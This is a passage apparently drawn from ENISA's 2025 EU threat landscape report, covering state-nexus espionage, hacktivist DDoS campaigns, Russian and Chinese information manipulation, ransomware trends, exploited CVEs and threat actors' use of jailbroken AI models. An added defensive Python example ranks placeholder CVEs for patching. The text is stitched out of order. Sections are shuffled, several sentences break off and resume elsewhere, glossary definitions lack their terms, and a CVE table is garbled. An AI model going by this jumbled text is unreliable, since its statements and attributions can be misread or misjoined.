A similar pattern was seen with Flax Typhoon’s leveraging of the Quad7 botnet, compromising thousands of TP-Link routers in Europe259 260 261 262 263. Mustang Panda and APT41 demonstrated a clear focus on maritime and shipping industries, leveraging updated TTPs and toolsets264 265 266 267 268 269 270 271 272. Mustang Panda was also seen targeting governments and defence-related events in the EU273. Finally, and of particular concern, is the targeting of the telecommunications sector by China-nexus intrusion sets, which is reportedly the sole focus of Liminal Panda, Locksmith Panda and Salt Typhoon274; these were increasingly reported in Asia and the US. In the EU, Salt Typhoon has been active since at least December 2024, with activities continuing in 2025 and at least three EU MSs impacted275 276.
launch of its RaaS platform in June 2024441, and has targeted multiple EU MSs ever since, with increased activity reported in April 2025. Hacktivist groups continued displaying intent, capacity and opportunity to target OT systems, as illustrated by Z-PENTEST-ALLIANCE’s claimed targeting of Internet-accessible OT management interfaces operated in the energy and water management sectors442, notably in Italy443 444 445 446 447 448 449, Czechia450, Lithuania451 452 453 454, Poland455, Portugal456, the Netherlands457 and Spain458 459. While these attacks reportedly did not result in significant operational impact, the sharing of videos showing Z-PENTEST-ALLIANCE operators tampering with OT systems is assessed to aim at amplifying the threat for psychological impact. Z-PENTEST-ALLIANCE reportedly became the leading hacktivist group targeting critical infrastructure, with a focus on energy infrastructure in the EU, with Italy documented as the most frequently targeted EU MS in OT attacks by hacktivists, followed by Czechia, France and Spain460. Z-PENTEST-ALLIANCE has increasingly proclaimed its intention to target OT since Q1 2025, notably through its alleged association with the Russia-nexus intrusion set Sandworm. While Sandworm was previously documented operating the Cyber Army of Russia Reborn (CARR) faketivist group, this claim cannot be verified and is assessed as doubtful at the time of reporting. Emerging in June 2025, the Infrastructure Destruction Squad (IDS)461 reportedly developed the VoltRuptor ICS-specific malware, reportedly offering advanced multi-protocol support and advanced persistence and anti-forensics capabilities to enable cross-platform operations. On 30 June 2025, IDS reportedly compromised an Italian smart building automation company462. Of note, VoltRuptor is documented as being available for sale on the dark web.
As this threat is too recent to assess, the leveraging of the IDS persona by a Russia-nexus intrusion set is a realistic working hypothesis.
9.4.2 Evolution of the ecosystem
In addition to previously mentioned hacktivist activities overlapping with cybercrime TTPs and ecosystems, newly formed alliances gathering together hacktivist groups with seemingly distinct ideologies were announced during the reporting period. Further complementing bilateral associations463 464 465 466, highlights of this increasing trend include the formation of The Holy League, announced in July 2024467, reportedly gathering 70 groups, including pro-Russia NoName057(16) and pro-Palestine hacktivists, to target Ukraine, Israel and countries perceived as supporting Ukraine and Israel, as well as NATO Allies, including EU MSs. The Holy League notably targeted Spain in retaliation for the arrest of individuals linked to NoName057(16)’s DDoSia, which led to NoName057(16)’s claimed DDoS attacks against multiple Israeli entities presented as a token of appreciation
From an EU vantage point and based on ENISA’s open-source collection, at least 115 exploited vulnerabilities were reported impacting and/or targeting EU MSs organisations489. This includes vulnerabilities that were subject to a coordinated publication of advisories by the European Union CSIRTs Network (CNW) members490 491 and confirmed to be exploited in open sources. While not the only factor, vulnerability distribution also reflects the installed base in the EU. For instance, Microsoft largely dominates across the environments of consumers and public and private organisations492. Further analysis of the ENISA dataset, with vulnerabilities matched against MITRE ATT&CK IDs, confirms that attackers consistently exploit Internet-facing applications (T1190). Vulnerabilities impacting Confluence, Exchange (ProxyLogon/ProxyShell), Citrix NetScaler, Fortinet/Check Point/Palo Alto VPN appliances, PaperCut, TeamCity, ActiveMQ, vCenter and Zimbra dominate the set — typical of mass-exploitation waves where perimeter services are scanned and compromised within hours of disclosure. A smaller but critical part consists of local privilege escalation (T1068), under which vulnerabilities such as PwnKit and Windows CLFS were exploited to escalate webshell footholds to SYSTEM or Domain Admin and facilitate lateral movement. On the end-user side, client execution (T1203) remains prevalent (Office Equation Editor, WinRAR, browser zero-days), almost always appearing alongside phishing (T1566.001) or drive-by compromise (T1189) as the delivery vector. These TTPs reflect a combination of opportunistic exploitation of exposed services and targeted post-exploitation to maintain persistence, escalate privileges and exfiltrate data.
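The technique breakdown above maps directly onto a patch-prioritisation routine. The Python below is an added example, not ENISA’s code or dataset: it buckets exploited-vulnerability records into the categories the report names (T1190 perimeter, T1068 local privilege escalation, T1203 client execution with T1566.001/T1189 delivery), reports their shares, and ranks them by exposure and speed of weaponisation after disclosure. The records, the CVE-0000-* placeholder ids and the scoring weights are all constructed assumptions.

```python
"""Added example (not ENISA's code or dataset): bucket exploited-vulnerability
records by the ATT&CK techniques the report names and rank them for patching.
All records are constructed; the CVE-0000-* ids are placeholders, not real."""
from collections import Counter
from dataclasses import dataclass
from datetime import date
from typing import Optional

# Technique buckets as the report groups them.
PERIMETER = {"T1190"}              # Exploit Public-Facing Application
LOCAL_PRIVESC = {"T1068"}          # Exploitation for Privilege Escalation
CLIENT_SIDE = {"T1203"}            # Exploitation for Client Execution
DELIVERY = {"T1566.001", "T1189"}  # Spearphishing Attachment, Drive-by Compromise

# Assumed base weights: perimeter services get scanned within hours of
# disclosure, so they rank first; privilege escalation needs an existing
# foothold; client-side bugs still need a delivery vector.
BASE_WEIGHT = {"perimeter": 40, "local_privesc": 25, "client_side": 15, "other": 5}


@dataclass(frozen=True)
class ExploitedVuln:
    cve: str                         # constructed placeholder id
    product: str
    techniques: frozenset            # ATT&CK technique ids seen with it
    disclosed: date
    first_exploited: Optional[date]  # None when no in-the-wild use was seen


def category(v: ExploitedVuln) -> str:
    """Map a record to the bucket used in the report's breakdown."""
    if v.techniques & PERIMETER:
        return "perimeter"
    if v.techniques & LOCAL_PRIVESC:
        return "local_privesc"
    if v.techniques & CLIENT_SIDE:
        return "client_side"
    return "other"


def delivery_vectors(v: ExploitedVuln) -> frozenset:
    """Delivery techniques paired with a client-side bug (empty otherwise)."""
    if category(v) != "client_side":
        return frozenset()
    return frozenset(v.techniques & DELIVERY)


def bucket_shares(records) -> dict:
    """Share of records per bucket, in percent rounded to one decimal."""
    counts = Counter(category(r) for r in records)
    total = sum(counts.values())
    return {k: round(100.0 * n / total, 1) for k, n in counts.items()}


def days_to_exploitation(v: ExploitedVuln) -> Optional[int]:
    """Days from disclosure to first observed exploitation. Negative means a
    zero-day (exploited before disclosure); None means never seen exploited."""
    if v.first_exploited is None:
        return None
    return (v.first_exploited - v.disclosed).days


def speed_weight(days: Optional[int]) -> int:
    """Faster weaponisation after disclosure means a shorter patch window."""
    if days is None:
        return 0
    # zero-days and same/next-day exploitation score highest
    return 30 if days <= 1 else 20 if days <= 7 else 10 if days <= 30 else 0


def patch_priority(v: ExploitedVuln) -> int:
    """Score 0-100: bucket weight + 30 if exploited in the wild + speed."""
    exploited = 30 if v.first_exploited is not None else 0
    return BASE_WEIGHT[category(v)] + exploited + speed_weight(days_to_exploitation(v))


def rank_for_patching(records) -> list:
    """CVE ids ordered highest priority first (ties broken by id)."""
    return [r.cve for r in sorted(records, key=lambda r: (-patch_priority(r), r.cve))]


# Constructed sample, modelled on the product classes the report lists.
SAMPLE = [
    ExploitedVuln("CVE-0000-0001", "Confluence", frozenset({"T1190"}),
                  date(2024, 9, 1), date(2024, 9, 1)),
    ExploitedVuln("CVE-0000-0002", "Citrix NetScaler", frozenset({"T1190"}),
                  date(2024, 10, 10), date(2024, 10, 13)),
    ExploitedVuln("CVE-0000-0003", "Windows CLFS", frozenset({"T1068"}),
                  date(2024, 11, 12), date(2024, 11, 5)),  # zero-day
    ExploitedVuln("CVE-0000-0004", "PaperCut", frozenset({"T1190"}),
                  date(2025, 1, 15), date(2025, 2, 20)),
    ExploitedVuln("CVE-0000-0005", "Office Equation Editor",
                  frozenset({"T1203", "T1566.001"}), date(2024, 8, 1), date(2024, 9, 15)),
    ExploitedVuln("CVE-0000-0006", "WinRAR", frozenset({"T1203", "T1189"}),
                  date(2025, 3, 3), date(2025, 3, 5)),
    ExploitedVuln("CVE-0000-0007", "PwnKit (polkit)", frozenset({"T1068"}),
                  date(2025, 4, 1), None),
]

if __name__ == "__main__":
    print("bucket shares:", bucket_shares(SAMPLE))
    for cve in rank_for_patching(SAMPLE):
        v = next(r for r in SAMPLE if r.cve == cve)
        print(f"{cve} {v.product:<24} {category(v):<14} "
              f"score={patch_priority(v):3d} delivery={sorted(delivery_vectors(v))}")
```

A zero-day (first exploited before disclosure) yields a negative day count and is deliberately scored like same-day exploitation, since there was no patch window at all.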
Based on identified TTPs, including the vulnerabilities listed above, all identified malware types call for execution prevention, endpoint behaviour monitoring, privilege control, network filtering, auditing and user training, which form the baseline of cyber hygiene. Together, the three categories illustrate the need for an evolving defensive posture: from preventing initial compromise, to containing impact, to safeguarding against long-term remote access. For loaders, mitigations focus heavily on blocking initial execution and persistence. Restricting the registry, DLL loading and software installation is central, reflecting loaders’ role as initial footholds. Mitigations against ransomware build on the loader baseline but emphasise the need for resilience and business continuity. Backups, remote storage, data loss prevention and network segmentation are critical. Identity management (password policies, MFA implementation) is reinforced since ransomware operators rely on credential abuse during lateral spread. Matching the depth of ransomware mitigations, measures against RATs also include controls against long-term persistence (library loading restrictions, account use policies). RAT mitigations reflect both stealthy footholds and
The targeting of the public administration by Russia-nexus threat groups such as APT28, APT29, Turla, and GoldenJackal, is more diverse, impacting diplomatic entities, ministries, law enforcement and political parties, in addition to core government institutions. A newcomer among the most active state-nexus intrusion sets in the EU, Sidewinder demonstrated a clear focus on diplomatic entities and governmental organisations within EU public administrations.
5.2 TRANSPORT
While remaining in second position compared to the previous ETL, the number of recorded incidents against the EU transport sector amounted to 7.5% of all incidents across all sectors. Of note, 12% of the incidents with a significant impact reported under the NIS directive in 2024 were incidents in the transport sector109.
The distribution of incidents impacting the transport sector in the EU highlights a concentration of incidents in air transport (58.4%), followed by logistics (20.8%). Of note, it is likely logistics would include entities involved in air, water, road and rail transport.
Yet again, the transport sector was largely impacted by hacktivist-led DDoS attacks (87.6%); the most active hacktivist groups against this sector included NoName057(16) (36.4%), DarkStorm Team (15.4%) and Mysterious Team Bangladesh (6.2%). As previously mentioned, increased activity was triggered by specific events at the EU national level110 111 112 and/or support for Ukraine.
9. HACKTIVISM
Despite their minimal impact and low-sophistication attacks, hacktivist groups remained the most active threat against EU MSs, with claimed attacks continuously increasing over the reporting period, reaching 79% of total incidents. DDoS attacks against the websites of EU MSs constituted 91.5% of incidents, with exceptionally low instances of claimed intrusions (5.1%) and data breaches (3.4%). Of particular interest, in addition to the increased activity against EU MSs by pro-Russia hacktivist groups, is the prevalence of pro-Palestine groups, likely related to announcements of an increasing number of alliances.
9.1 KEY HACKTIVISM THREATS
At least 88 hacktivist groups claimed they targeted EU MSs organisations. Pro-Russia nexus hacktivist groups remain prevalent, with 63.1% of attacks claimed by NoName057(16), followed by Keymous+ (14.1%), Dark Storm Team (12.1%), Mr Hamza (7.9%), and RipperSec (2.8%). While the core hacktivist threat landscape is shaped by a few hacktivist groups, it is also populated by short-lived campaigns triggered by specific events, with hacktivist groups claiming attacks and then disappearing, and claimed activities ranging from a few days to a few weeks.
The tempo of activity across the five most active hacktivist groups indicated differing operational patterns. Pro-Russia NoName057(16) sustained the highest operational tempo, with continuous campaigns throughout the reporting period and a clear ability to mobilise rapidly across multiple EU states, likely due to their crowd-sourced model operationalised through the DDoSia platform. The Dark Storm Team also demonstrated a steady tempo, with frequent medium-scale operations, while Keymous+ displayed a spike-driven tempo, characterised by bursts of activity in specific quarters, notably against France and Estonia, pointing to possible ad-hoc mobilisation. Mr Hamza’s activity remained episodic, with periods of large-scale attacks followed by lulls. Finally, RipperSec exhibited a low but increasing tempo from September 2024 onwards.
8. FOREIGN INFORMATION MANIPULATION AND INTERFERENCE
8.1 KEY FIMI THREATS
This section was jointly written by ENISA and EEAS STRATCOM. Over the reporting period, multiple EU MSs were targeted by FIMI, primarily carried out by Russia-aligned Information Manipulation Sets, with increased activities around electoral events.
8.1.1 Russia-aligned Information Manipulation Sets
EEAS collected 86 FIMI operations targeting EU entities or EU MSs institutions. Known Information Manipulation Sets (IMS) accounted for 60.5% of all identified cases. Russia-aligned IMS, including Doppelgänger, Matryoshka, Storm-1516, the Russian Foundation to Battle Injustice and Portal Kombat, conducted FIMI operations against specific EU entities and EU MSs public institutions, notably in France, Germany and Poland. Heavily correlated with current events, identified FIMI aimed at interfering in key events such as elections or opportunistically exploiting breaking news events, including EU political events. Among the 86 identified cases, 52 involved at least one known IMS, with Matryoshka (18 cases) being the most active. Doppelgänger (6), Storm-1516 (5) and the Russian Foundation to Battle Injustice (4) were involved to a lesser extent. In 19 cases, the Portal Kombat infrastructure was used to amplify content341 342. Four additional cases were imputed to other known IMS. Approximately a quarter of the documented FIMI content focused on degrading the Union through negative narratives. High-ranking officials such as the President of the European Commission and the High Representative for Foreign Affairs and Security Policy and Vice-President of the European Commission were frequently targeted ahead of key strategic events343 or discredited through the circulation of out-of-context pictures and quotes, disseminated via inauthentic articles and amplified by unassociated accounts344, as well as statements from state-controlled Russian media345.
Standing out in terms of both the frequency and diversity of operations against their public institutions, France, Germany and Poland are frequently targeted with narratives aimed at discrediting their government, military and intelligence services, often accusing them of destabilisation efforts abroad or failing in their fundamental duties, such as protecting their own citizens346. Police departments347 and public media outlets348 are commonly at the centre of Matryoshka campaigns, where they are either impersonated or misattributed to
A political determination linking cyber activity to a specific actor or group based on technical and intelligence evidence.
A social engineering tactic tricking users into clicking links to 'fix' fake security issues, often leading to malware.
CVE Numbering Authority, an entity authorised to assign CVE identifiers for vulnerabilities.
Common Vulnerabilities and Exposures, a reference system for publicly disclosed security flaws.
Common Vulnerability Scoring System, a standardised framework for rating software vulnerabilities.
Common Weakness Enumeration, a classification of software weaknesses that can lead to vulnerabilities.
An event that compromises the integrity, confidentiality or availability of information systems, networks, or data.
An incident where sensitive, protected or confidential data is accessed or disclosed without authorisation.
European Vulnerability Database Identifier, a unique identifier for vulnerabilities in the EU context.
Impersonation of a hacktivist persona.
Initial Access Broker, a threat actor who sells or trades access to compromised systems.
A provisional association of cyber activity with an intrusion set, based on technical indicators (aka technical attribution).
Malware designed to steal sensitive information such as credentials, banking data or system details.
A cluster of related intrusion activity imputed to a single threat actor or campaign over time.
Email campaigns that distribute malicious attachments or links to deliver malware.
Use of malicious online advertisements to distribute malware or redirect users to harmful sites.
Employees conducting unauthorised cyber activities or side jobs, possibly for financial gain.
QR code-based phishing attacks that direct victims to malicious websites or payloads.
An intrusion set or campaign whose objectives allegedly align with a state's interests, without formal state control.
An intrusion set or campaign with alleged direct operational or strategic ties to a nation-state.
A cyberattack exploiting vulnerabilities in suppliers or service providers to compromise downstream entities.
An attack that compromises a partner, supplier or vendor to target another organisation.
A phishing attack conducted over voice calls to trick victims into revealing sensitive information.
A previously unknown flaw in software or hardware exploited before a fix is available.
for Holy League’s attacks on Spain468 469. The Holy League was also observed carrying out attacks against the websites of French governmental entities and financial systems470 471, in the context of the Ukrainian President’s visit to Paris to hold a ‘Trilateral meeting’ with the French President and the then US president-elect. The hacktivist ecosystem was also impacted by disruptions to their tools and means, as seen with Telegram’s increased cooperation with law enforcement, operationalised through the ban or takedown of more than 60 hacktivist-linked aliases in Q1 2025472. This notably resulted in hacktivist groups migrating to private Telegram rooms473, X474 475, Element476, and dark web forums477. In December 2024, Operation PowerOFF saw LEAs from 15 countries shut down 27 DDoS-for-hire platforms and arrest three administrators478 479. This effort was expanded in May 2025, when a follow-up operation took six more DDoS-for-hire platforms offline and resulted in four arrests in Poland and nine domain seizures in the US480. Examples of potential identity spoofing were also reported for the first time, with the claimed reappearance of pro-Russian Killmilk in May 2025481 and cases of NoName057(16) impersonations with the use of ransomware decoys.
Akira maintained a continuous but low tempo, SafePay rose to prominence in Q2 2025145, while Hunters International, which had sustained steady activity in 2024, recorded a decline following a public announcement in 2025146. RansomHub, previously one of the most deployed ransomware strains in the EU, went offline on 1 April 2025147, shortly after increased activity around the formation of a new ransomware alliance led by the DragonForce group. Info-stealers sold on cybercriminal marketplaces remained a consistent threat vector during the reporting period, primarily facilitating credential theft, session hijacking and access brokering. Although the impact of info-stealer use cannot be assessed, they continue to be key enablers of malware deployments, making them a solid and prevalent link in the cybercriminal supply chain, as notably illustrated through the BlackBasta leaks148. The info-stealer market observed a significant disruption following Operation Magnus in October 2024, which notably led to the dismantling and seizure of the infrastructure of RedLine and META, two prevalent long-running info-stealer families149 150. This led to an increase of more than 350% in the use of the Lumma info-stealer between the first and second halves of 2024151. Within the EU, waves of Lumma infections were seen in Italy between September 2024 and March 2025152 153.
original content may be authentic, it is reframed to better fit FIMI narratives and disseminated by unattributed channels (T0049.003 Bots Amplify via Automated Forwarding and Reposting, T0140.001 Defame).
• False documents. These were used to target mostly public institutions in EU MSs through misattribution. The documents allegedly ‘leaked’ are disseminated on social media through unattributed channels (T0003 Leverage Existing Narratives).
• Amplification by state-controlled channels. Official Russian and Belarusian state-controlled channels published content aiming to discredit the EU on multiple occasions, which was then disseminated in various languages by unattributed channels and at times the Portal Kombat infrastructure (T0023 Distort Facts, T0140.001 Defame).
• Artificial Intelligence. Over the past year, FIMI actors increasingly relied on Artificial Intelligence (AI) to facilitate their efforts, with 14.3% of recorded cases targeting EU entities and public institutions in EU MSs.
The TTPs shown in the graph hereunder are tagged according to the DISARM framework380 and give a general overview on the type of behaviour and assessed motives of the IMS.
8.2.2 Exploitation of strategic events
Over the reporting period, 72.5% of cases of FIMI campaigns targeting Union entities and EU public institutions either targeted an event or opportunistically exploited current news. European institutions were targeted during the Polish elections mostly by the Doppelgänger campaign; this activity was complemented by Russian and Belarusian media. The IMS focused its efforts on targeting EU institutions, aiming to undermine key policies, particularly the Green Deal, while portraying Brussels as interfering in Poland’s sovereign decision-making381 382. Russian and Belarusian media activity focused on accusing the EU, especially its Commission and Parliament, of interfering in the Polish elections383 384.
The prevalence of cybercriminal-led intrusions is illustrated through the type of malicious code deployed following intrusions, as well as the outcome of recorded intrusions. The combined share of ransomware, banking trojan, and infostealers accounts for 87.3% of these intrusions.
Out of recorded intrusions, 68.6% led to data breaches leaked on cybercriminal forums for sale, including 2.8% of these advertised breaches being presented as a direct outcome of a ransomware attack. Data exfiltration, including credential theft (8.9%) and strategic data collection (21.3%) accounted for 30.2%.
The distribution of threat categories shows a clear concentration in a few areas. Mobile threats account for the largest share at 42.4%, highlighting how mobile devices continue to be a primary attack surface. Web threats follow with 27.3%, underlining the persistent exploitation of online services and applications. Operational technology threats represent 18.2%, reflecting the growing exposure of industrial and critical systems as they continue being increasingly connected and targeted. Supply chain risks make up 10.6%, showing that attackers are actively leveraging indirect pathways through third-party providers and dependencies.
This is notably illustrated by NoName057(16) explicitly mentioning announcements by Czechia, Latvia and Poland related to new bilateral security agreements with Ukraine as a trigger to target transport entities in these EU MSs113 114 115. In December 2024, Italy’s Malpensa and Linate airport portals were briefly unreachable in attacks later claimed by NoName057(16)116 117 118, likely in the context of Italy’s government decree to authorise the transfer of means, materials and equipment to Ukraine.
Cybercrime incidents against the transport sector accounted for 8.4% of all incidents, with ransomware accounting for 83.9% and data breaches 16.1% of cybercrime incidents. The top three ransomware claims against the EU transport sector include Akira (12.9%), INC Ransom (9.7%), and Cl0p (9.7%). Despite being a small share of recorded events, ransomware displayed a more disruptive impact in a few cases. For instance, following an incident reportedly involving Akira ransomware, the Split Airport in Croatia saw the disruption of the passenger reception information system, ultimately impacting the landing and take-off of aircraft and leading to a temporary suspension of all flights119 120.
platforms, mostly X, Bluesky and, in some cases, Reddit368. Identified content focuses on portraying the EU as a hegemonic power interfering in Member States’ politics, particularly undermining their democratic processes by alleging that the EU is persecuting opposition parties and even attempting to ban them or violating human rights369.
8.1.2 Other Information Manipulation Sets
In August 2024, an open-source publication documented an information operation aligned with China’s strategic interests through social networks370. Named Green Cicada Network, this campaign operated a botnet comprised of 5 000 AI-operated accounts on X, notably accounts purportedly originating from the EU, to target Western European audiences. This campaign is assessed as being carried out by Yukuo Cen (aka cenyk1230), a Chinese AI researcher employed at Zhipu AI, a company allegedly tied to the People's Liberation Army and Chinese intelligence services. Of interest is the convergence, mutual learning and increasing alignment between Chinese and Russian IMS, and the adoption of Russian FIMI disinformation TTPs by China, leading to overlapping narratives and coordinated influence operations where Russian and Chinese networks mutually amplify content, notably to spread anti-Western narratives – for instance when Chinese state-controlled media offer a platform to sanctioned Russian outlets371 372. The China-aligned Spamouflage operation targeted Spain from December 2024 into January 2025, leveraging the floods in Valencia, Spain, to call for the overthrow of the Spanish government373. Also identified over the reporting period were Iran-aligned influence operations pertaining to the participation of Israel in the Olympics374 375, as well as operation A2Z, a campaign sharing similarities with VIGINUM’s (U) notorious BIG, associated with the Baku Initiative Group (BIG)376 377, notably targeting audiences in France, Italy, Poland and Germany378.
8.2 KEY FIMI TRENDS
8.2.1 Tactics, Techniques and Procedures (TTPs)
FIMI activities targeting EU entities and public institutions in Member States leverage a wide array of techniques as defined by the DISARM framework379.
• The use of inauthentic news articles. This was the most common type of content to convey narratives against EU entities and public institutions in EU MSs (T0085 Develop Text-Based Content, T0140.001 Defame, T0066 Degrade Adversary). Articles are often transformed into social media posts either by taking the headline or a text extract to be amplified across platforms (T0084 Reuse Existing Content).
• Fabricated investigations. EU entities and public institutions in EU MSs were the subject of fabricated investigations (T0085 Develop Text-Based Content, T0023.001 Reframe Context). Often originated by the Russian Foundation to Battle Injustice, the content was laundered through inauthentic websites and unattributed channels posting across platforms (T0119 Cross-Posting; 37.2%). It was translated and shared across multiple inauthentic websites and accounts on X (T0003 Leverage Existing Narratives, T0049.003 Bots Amplify via Automated Forwarding and Reposting).
• Decontextualised quotes and images. FIMI actors aimed to discredit EU officials by decontextualising and reframing statements, images or previously published content (T0023.001 Reframe Context). While the
1. EXECUTIVE SUMMARY
This year’s ENISA Threat Landscape (ETL) introduces a revised and concise format designed to deliver insights through a threat-centric approach and enhanced contextualisation. This edition integrates additional analysis of adversary behaviours, vulnerabilities and geopolitical drivers, aimed at both strategic and operational audiences, offering an actionable perspective on trends shaping the EU’s cyber threat environment. The ETL 2025 provides an overview of the European cyber threat ecosystem from July 2024 to June 2025, drawing on nearly 4 900 selected and curated incidents. The reporting period highlights a maturing threat environment characterised by rapid exploitation of vulnerabilities and growing complexity in tracking adversaries. Intrusion activity remains significant, with ransomware at its core. Cybercriminal operators notably responded to the actions of law enforcement by decentralising operations, adopting aggressive extortion tactics and capitalising on regulatory compliance fears.
The continuous proliferation of ransomware-as-a-service models, builder leaks and the services of access brokers has further lowered barriers to entry and diversified ransomware families, fuelling a professionalised and resilient criminal ecosystem. In parallel, state-aligned threat groups intensified their long-term cyberespionage campaigns against the telecommunications, logistics networks and manufacturing sectors in the EU, demonstrating advanced tradecraft such as supply chain compromise, stealthy malware frameworks and abuse of signed drivers. Hacktivist activity continues to dominate reporting, representing almost 80% of recorded incidents and driven primarily by low-level distributed denial-of-service operations. While overall resulting in very low impact, these campaigns demonstrate how low-cost tools are scaled for ideology-driven operations. Sectoral targeting patterns reinforce the EU’s systemic exposure.
Public administration networks remain the primary focus (38%), notably for hacktivists and state-nexus intrusion sets, while transport emerged as a high-value sector, particularly maritime and logistics. Aviation and freight operations have faced ransomware disruptions, while digital infrastructure and services remain strategic targets for both cyberespionage and ransomware operators. Phishing remains the dominant intrusion vector (60%) and is evolving through techniques used in large-scale campaigns. The availability of phishing-as-a-service platforms demonstrates the industrialisation of phishing operations, enabling adversaries of all skill levels to launch complex campaigns. Abuse of cyber dependencies has also intensified, as shown by compromises in open-source repositories, malicious browser extensions and breaches of service providers, amplifying risk throughout interconnected digital ecosystems.
Across all campaigns, adversaries continue to rely on a consistent set of tactics, techniques and procedures. Vulnerability exploitation remains a cornerstone of initial access (21.3%), with widespread campaigns rapidly weaponising vulnerabilities within days of their disclosure—underscoring the need to ensure patch availability and to implement and enforce basic measures for cyber hygiene. Artificial intelligence has become a defining element of the threat landscape. By early 2025, AI-supported phishing campaigns reportedly represented more than 80 percent of observed social engineering activity worldwide, with adversaries leveraging jailbroken models, synthetic media and model poisoning techniques to enhance their operational effectiveness. The threat landscape depicted in this edition reflects how the cyber threat landscape is shifting toward mixed, possibly convergent pressure, with fewer single high-impact incidents, and more continuous, diversified and convergent campaigns that collectively erode resilience.
6. CYBERCRIME
While accounting for 13.4% of all incidents, cybercrime remained a prevalent threat for the short-to-medium term, with encrypting ransomware constituting the most directly impactful threat. Over the reporting period, cybercrime activities targeting EU organisations notably included ransomware (81.1%) and data breaches (15.2%); the latter were specifically documented as resulting from ransomware incidents. The structure of the cybercriminal ecosystem was regularly impacted by the operations of Law Enforcement Agencies (LEA) and by internal competition among cybercriminal groups.
6.1 KEY CYBERCRIME THREATS
Based on monitored Data Leak Sites (DLS) and cybercriminal forums, cybercrime claims accounted for 81% of activities. Known EU victims span a broad range of sectors, with at least 36 sectors identified in total, including the critical sectors listed in the NIS2 Directive, with DIS and the manufacturing sector remaining the most impacted in the EU. Over the reporting period, data breaches primarily impacted EU digital infrastructure and services (27.7%), notably through the sale of customer data from telecommunications providers, followed by the sale of data related to public administration (17%). Ransomware claims were made primarily against the manufacturing sector (14.9%). While the recorded share of ransomware deployments remained stable, a shift in the ransomware ecosystem was observed over the reporting period, marked by continuous fragmentation and ultimately leading to the emergence of new ransomware variants and Ransomware-as-a-Service (RaaS) programmes. A total of 82 ransomware variants were reportedly deployed against EU MS organisations, with Akira emerging as the most frequently deployed (11.6%), followed by SafePay (10.1%) and Qilin (7.5%). While a few major groups and ransomware strains were particularly prevalent in the previous reporting period, activity in 2024–2025 was more evenly distributed. This evolution is clearly illustrated by LockBit3, which accounted for nearly a quarter of all reported claims over the previous reporting period (ETL 2024) with 198 claims. In May 2025, the LockBit ransomware programme was reportedly compromised, resulting in the leak of its internal database, which likely explains the absence of claims by this group since 27 May 2025140 and the emergence of LockBit4 since April, notably leveraged by an operator called Syrphid141. Similarly, a decrease in 8Base’s deployments followed partial infrastructure leaks and administrator arrests in early 2025142.
Showing a significant decrease in EU deployments (0.73%) against Austrian, French, German and Italian organisations, BlackBasta has not claimed any incidents since January 2025. In February, the BlackBasta group’s internal chat messages were leaked, exposing disagreements among members as well as its toolset, eventually leading to the group’s infrastructure going offline143 144.
While low overall (4.1%), the targeting of the EU transport sector by state-nexus threat groups was dominated by China-nexus and Russia-nexus intrusion sets (46.7%). China-nexus intrusion sets, including Mustang Panda, UNC5221 and APT41, notably focused on the maritime, shipping and logistics subsectors across multiple EU MSs. This activity aligns with Beijing’s strategic interest in securing maritime supply chains and transport corridors tied to the Belt and Road Initiative, as well as in maintaining visibility over European trade infrastructure. Russia-nexus intrusion sets, notably APT28, seemingly focused on air transport, logistics and freight, particularly in Germany, France and Belgium, likely reflecting Moscow’s broader strategy of targeting the critical infrastructure of NATO Allies, especially in the context of the war in Ukraine.
Smaller shares are associated with the DPRK-nexus Lazarus (6.7%), possibly aiming to gather strategic data pertaining to sanctions evasion. Rare Werewolf’s activity against the logistics sector of an EU MS represents a residual threat, likely linked to spillover activities.
5.3 DIGITAL INFRASTRUCTURE AND SERVICES
For the purpose of this report, the notion of digital infrastructure and services (DIS) includes the digital infrastructure sector as defined in NIS2, as well as incidents related to digital providers and ICT service management. With a share of 4.8% of overall incidents, DIS ranks third among the top five targeted sectors across the EU over the reporting period. While the targeting of DIS likely stems from the sector being of high value for collecting data and disrupting services at a larger scale, it is likely this also speaks to the dispersed nature and heterogeneous levels of maturity of the organisations comprising this ecosystem.
Known exploited vulnerabilities used against EU organisations (table columns recovered from the extracted text; the affected product column is incomplete and its row alignment is not recoverable):
Affected products (partial): Microsoft Exchange Server 2016 Cumulative Update 19; Microsoft Exchange Server 2016 Cumulative Update 19; Microsoft Exchange Server 2019; Microsoft Exchange Server 2019; Microsoft Exchange Server 2013 Cumulative Update 23; Windows 10 Version 1809; Microsoft Exchange Server 2013 Cumulative Update 23; Microsoft Exchange Server 2013 Cumulative Update 23
CVE: CVE-2021-4034, CVE-2021-42278, CVE-2021-44026, CVE-2022-27924, CVE-2022-3236, CVE-2022-41128, CVE-2023-20118, CVE-2023-20198, CVE-2023-22515, CVE-2023-22527, CVE-2023-23397
EUVD ID: EUVD-2021-33934, EUVD-2021-29254, EUVD-2021-30885, EUVD-2022-32412, EUVD-2022-42644, EUVD-2022-44371, EUVD-2023-24297, EUVD-2023-24377, EUVD-2023-26655, EUVD-2023-26667, EUVD-2023-27497
CVE: CVE-2023-27350, CVE-2023-27532, CVE-2023-28461, CVE-2023-34048, CVE-2023-3519, CVE-2023-38831, CVE-2023-42793, CVE-2023-43770, CVE-2023-46604, CVE-2023-46747, CVE-2023-48788, CVE-2024-0012, CVE-2024-20399, CVE-2024-21287, CVE-2024-21338, CVE-2024-21412, CVE-2024-21762
EUVD ID: EUVD-2023-31126, EUVD-2023-31287, EUVD-2023-32140, EUVD-2023-38166, EUVD-2023-44176, EUVD-2023-42604, EUVD-2023-47222, EUVD-2023-48147, EUVD-2023-2719, EUVD-2023-50916, EUVD-2023-52821, EUVD-2024-15815, EUVD-2024-18114, EUVD-2024-19000, EUVD-2024-19050, EUVD-2024-19121, EUVD-2024-19376
use of deepfakes73 74 75 76 77 78 79, as well as for malware development80 81 82 83. Threat groups were observed to be leveraging commercial LLMs to augment operations, as well as jailbroken or retrained (diverted) LLMs such as WormGPT, EscapeGPT and FraudGPT, to automate social engineering activities and accelerate the development of malicious tools84 85. China-nexus, Iran-nexus and DPRK-nexus intrusion sets were reported using AI solutions, including Google's Gemini86 and OpenAI’s ChatGPT87, primarily as research assistants for boosting productivity as well as for reconnaissance and anomaly detection evasion. Famous Chollima was notably seen using AI to generate convincing LinkedIn profiles and support communications with victim organisations88 89 90. The emergence of allegedly stand-alone malicious AI systems over the past two quarters, such as Xanthorox AI, likely indicates a trend of threat groups moving beyond jailbreaks towards customised tools running on local servers to avoid detection91.
